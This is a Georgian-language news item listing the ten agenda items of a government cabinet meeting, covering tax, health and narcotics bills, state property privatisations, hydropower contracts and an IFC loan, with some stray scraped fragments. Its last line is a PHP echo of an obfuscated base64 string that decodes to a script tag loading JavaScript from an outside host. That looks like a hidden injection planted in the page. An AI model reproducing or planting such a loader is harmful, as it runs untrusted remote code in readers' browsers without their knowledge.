celsiusi
ავერსი შნაიდერი

დღეს, მთავრობის ადმინისტრაციაში მინისტრთა კაბინეტის სხდომა 14:00 საათზე გაიმართება. მთავრობა დღის წესრიგით გათვალისწინებულ 10 საკითხს განიხილავს:

1. საქართველოს კანონების პროექტები „საგადასახადო დავალიანებებისა და სახელმწიფო სესხების რესტრუქტურიზაციის შესახებ“ საქართველოს კანონში ცვლილების შეტანის თაობაზე“ და „საქართველოს საგადასახადო კოდექსში ცვლილების შეტანის შესახებ“

მომხსენებელი: ფინანსთა მინისტრი ლაშა ხუციშვილი;

2. საქართველოს კანონის პროექტი „ჯანმრთელობის დაცვის შესახებ“ საქართველოს კანონში ცვლილების შეტანის თაობაზე“ და მისგან გამომდინარე კანონპროექტები.

მომხსენებელი: ჯანდაცვის მინისტრი ზურაბ აზარაშვილი; '

3. საქართველოს კანონის პროექტი „ნარკოტიკული საშუალებების, ფსიქოტროპული ნივთიერებების, პრეკურსორებისა და ნარკოლოგიური დახმარების შესახებ“ საქართველოს კანონში ცვლილების შეტანის თაობაზე“

მომხსენებელი: ჯანდაცვის მინისტრი ზურაბ აზარაშვილი;

4. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ”

მომხსენებელი: ეკონომიკის სამინისტრო, ლევან დავითაშვილი; 

5.  საქართველოს მთავრობის განკარგულებების პროექტები „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების სააქციო საზოგადოება „ენერგო-პრო ჯორჯიასათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ”  (2 პროექტი)

მომხსენებელი: ეკონომიკის სამინისტრო, ლევან დავითაშვილი;

6. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული ქონების უცხოური საწარმოს ფილიალი „ჩინეთის გზებისა და ხიდების კორპორაციის საქართველოს ფილიალისათვის“ იჯარის უფლებით გადაცემის თაობაზე თანხმობის მიცემის შესახებ“

მომხსენებელი: ეკონომიკის სამინისტრო ლევან დავითაშვილი; 

7. საქართველოს მთავრობის განკარგულების პროექტი „საქართველოს მთავრობასა და შპს „ენ-სი ჯგუფი 2022’’-ს შორის „სკრა ჰესის’’ ელექტროსადგურის შესახებ დასადები ხელშეკრულების თაობაზე“

მომხსენებელი: ეკონომიკის სამინისტრო ლევან დავითაშვილი; 

8. საქართველოს მთავრობის განკარგულების პროექტი „საქართველოს მთავრობასა და შპს „არაკალს’’ შორის „არაკალი ჰესის’’ შესახებ 2021 წლის 18 მარტს დადებულ ხელშეკრულებაში ცვლილების შეტანის თაობაზე“

მომხსენებელი: ეკონომიკის სამინისტრო ლევან დავითაშვილი; 

9. საქართველოს მთავრობის განკარგულების პროექტი „საერთაშორისო საფინანსო კორპორაციის (IFC) მიერ სს „იშბანკ საქართველოსთვის“ სესხის გაცემის შესახებ”

მომხსენებელი: ფინანსთა მინისტრი ლაშა ხუციშვილი; 

10. საქართველოს მთავრობის განკარგულების პროექტი „შეღავათიანი აგროკრედიტის პროექტისა და გადამმუშავებელი და შემნახველი საწარმოების თანადაფინანსების პროექტის დამტკიცების შესახებ“ საქართველოს მთავრობის 2014 წლის 27 იანვრის №139 განკარგულებაში ცვლილების შეტანის თაობაზე”

მომხსენებელი: სოფლის მეურნეობის მინისტრი ოთარ შამუგია. 

252
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");